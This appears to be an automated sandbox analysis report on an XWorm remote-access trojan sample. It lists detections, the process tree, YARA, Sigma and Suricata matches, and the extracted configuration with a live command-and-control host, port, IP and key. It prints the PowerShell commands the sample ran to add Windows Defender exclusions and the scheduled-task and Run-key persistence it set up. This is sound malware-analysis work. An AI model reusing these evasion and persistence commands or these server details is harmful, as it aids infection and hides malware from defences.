Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YPzNsfg4nR.exe

Overview

General Information

Sample name:YPzNsfg4nR.exe
renamed because original name is a hash value
Original sample name:691c8281d68680d1f8966d657bfbcf4d100c7a70d6894493946793cc320623a6.exe
Analysis ID:1585127
MD5:47f35ed89ba0b7756cc4d268e7516f55
SHA1:714b90afdccaee669f5e2edd1b8680c4631cffa0
SHA256:691c8281d68680d1f8966d657bfbcf4d100c7a70d6894493946793cc320623a6
Tags:exeuser-zhuzhu0009
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • YPzNsfg4nR.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\YPzNsfg4nR.exe" MD5: 47F35ED89BA0B7756CC4D268E7516F55)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 24572628.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\24572628.exe" MD5: FFD51738DC3483954A7BCDFAF713DB10)
      • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7536 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • coding (PID: 5384 cmdline: C:\ProgramData\coding MD5: FFD51738DC3483954A7BCDFAF713DB10)
  • OpenWith.exe (PID: 7752 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 7736 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 3536 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • coding (PID: 8084 cmdline: C:\ProgramData\coding MD5: FFD51738DC3483954A7BCDFAF713DB10)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["usb-alignment.gl.at.ply.gg"], "Port": 39219, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\codingJoeSecurity_XWormYara detected XWormJoe Security
    C:\ProgramData\codingJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\ProgramData\codingrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0xcc77:$str01: $VB$Local_Port
      • 0xccc0:$str02: $VB$Local_Host
      • 0xaf88:$str03: get_Jpeg
      • 0xb5d4:$str04: get_ServicePack
      • 0xe748:$str05: Select * from AntivirusProduct
      • 0xf0a6:$str06: PCRestart
      • 0xf0ba:$str07: shutdown.exe /f /r /t 0
      • 0xf16c:$str08: StopReport
      • 0xf142:$str09: StopDDos
      • 0xf238:$str10: sendPlugin
      • 0xf3b8:$str12: -ExecutionPolicy Bypass -File "
      • 0xfd04:$str13: Content-length: 5235
      C:\ProgramData\codingMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xe16c:$s6: VirtualBox
      • 0xe0ca:$s8: Win32_ComputerSystem
      • 0x10c19:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10cb6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x10dcb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xfc1f:$cnc4: POST / HTTP/1.1
      C:\Users\user\Desktop\24572628.exeJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 3 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xdf6c:$s6: VirtualBox
          • 0xdeca:$s8: Win32_ComputerSystem
          • 0x10a19:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x10ab6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x10bcb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xfa1f:$cnc4: POST / HTTP/1.1
          00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xfdb4:$s6: VirtualBox
            • 0xfd12:$s8: Win32_ComputerSystem
            • 0x12861:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x128fe:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x12a13:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x11867:$cnc4: POST / HTTP/1.1
            00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.0.24572628.exe.340000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                3.0.24572628.exe.340000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  3.0.24572628.exe.340000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                  • 0xcc77:$str01: $VB$Local_Port
                  • 0xccc0:$str02: $VB$Local_Host
                  • 0xaf88:$str03: get_Jpeg
                  • 0xb5d4:$str04: get_ServicePack
                  • 0xe748:$str05: Select * from AntivirusProduct
                  • 0xf0a6:$str06: PCRestart
                  • 0xf0ba:$str07: shutdown.exe /f /r /t 0
                  • 0xf16c:$str08: StopReport
                  • 0xf142:$str09: StopDDos
                  • 0xf238:$str10: sendPlugin
                  • 0xf3b8:$str12: -ExecutionPolicy Bypass -File "
                  • 0xfd04:$str13: Content-length: 5235
                  3.0.24572628.exe.340000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0xe16c:$s6: VirtualBox
                  • 0xe0ca:$s8: Win32_ComputerSystem
                  • 0x10c19:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x10cb6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x10dcb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xfc1f:$cnc4: POST / HTTP/1.1
                  0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    Click to see the 6 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\24572628.exe" , ParentImage: C:\Users\user\Desktop\24572628.exe, ParentProcessId: 7544, ParentProcessName: 24572628.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', ProcessId: 7704, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\24572628.exe" , ParentImage: C:\Users\user\Desktop\24572628.exe, ParentProcessId: 7544, ParentProcessName: 24572628.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', ProcessId: 7704, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\coding, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\24572628.exe, ProcessId: 7544, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\coding
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\ProgramData\coding, CommandLine: C:\ProgramData\coding, CommandLine|base64offset|contains: , Image: C:\ProgramData\coding, NewProcessName: C:\ProgramData\coding, OriginalFileName: C:\ProgramData\coding, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\ProgramData\coding, ProcessId: 5384, ProcessName: coding
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\24572628.exe" , ParentImage: C:\Users\user\Desktop\24572628.exe, ParentProcessId: 7544, ParentProcessName: 24572628.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', ProcessId: 7704, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\24572628.exe, ProcessId: 7544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coding.lnk
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\24572628.exe" , ParentImage: C:\Users\user\Desktop\24572628.exe, ParentProcessId: 7544, ParentProcessName: 24572628.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe', ProcessId: 7704, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7736, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T06:02:05.111357+010028559241Malware Command and Control Activity Detected192.168.2.550007147.185.221.2139219TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: usb-alignment.gl.at.ply.ggAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\ProgramData\codingAvira: detection malicious, Label: TR/Spy.Gen
                    Source: C:\Users\user\Desktop\24572628.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Found malware configuration
                    Source: 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["usb-alignment.gl.at.ply.gg"], "Port": 39219, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\ProgramData\codingReversingLabs: Detection: 91%
                    Source: C:\Users\user\Desktop\24572628.exeReversingLabs: Detection: 91%
                    Multi AV Scanner detection for submitted file
                    Source: YPzNsfg4nR.exeVirustotal: Detection: 16%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\ProgramData\codingJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\24572628.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: YPzNsfg4nR.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpString decryptor: usb-alignment.gl.at.ply.gg
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpString decryptor: 39219
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpString decryptor: <123456789>
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpString decryptor: <Xwormmm>
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpString decryptor: XWorm V5.6
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpString decryptor: USB.exe
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpString decryptor: %ProgramData%
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmpString decryptor: coding
                    Source: YPzNsfg4nR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: \ConsoleApp4\obj\Release\net4.8\win-x64\1fht7W0d34QhN.pdbSHA256J source: YPzNsfg4nR.exe
                    Source: Binary string: \ConsoleApp4\obj\Release\net4.8\win-x64\1fht7W0d34QhN.pdb source: YPzNsfg4nR.exe

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49999 -> 147.185.221.21:39219
                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50007 -> 147.185.221.21:39219
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: usb-alignment.gl.at.ply.gg
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\ProgramData\coding, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Desktop\24572628.exe, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.5:49999 -> 147.185.221.21:39219
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 147.185.221.21 147.185.221.21
                    Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: usb-alignment.gl.at.ply.gg
                    Source: powershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: powershell.exe, 0000000B.00000002.2641179501.0000021EE87F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: powershell.exe, 0000000B.00000002.2641179501.0000021EE87F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                    Source: powershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                    Source: svchost.exe, 00000013.00000002.3423579528.00000284AE4BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                    Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                    Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                    Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                    Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                    Source: qmgr.db.19.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                    Source: qmgr.db.19.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: YPzNsfg4nR.exe, 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, 24572628.exe, 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, 24572628.exe, 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, coding.3.dr, 24572628.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000004.00000002.2349698693.0000017045FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2458610974.000001A290075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2614120753.0000021EE0183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000004.00000002.2331273020.0000017036199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: 24572628.exe, 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2331273020.0000017035F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C1052E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000004.00000002.2331273020.0000017036199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000000B.00000002.2639330504.0000021EE8762000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                    Source: powershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                    Source: powershell.exe, 00000004.00000002.2331273020.0000017035F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C1052E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: edb.log.19.dr, qmgr.db.19.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
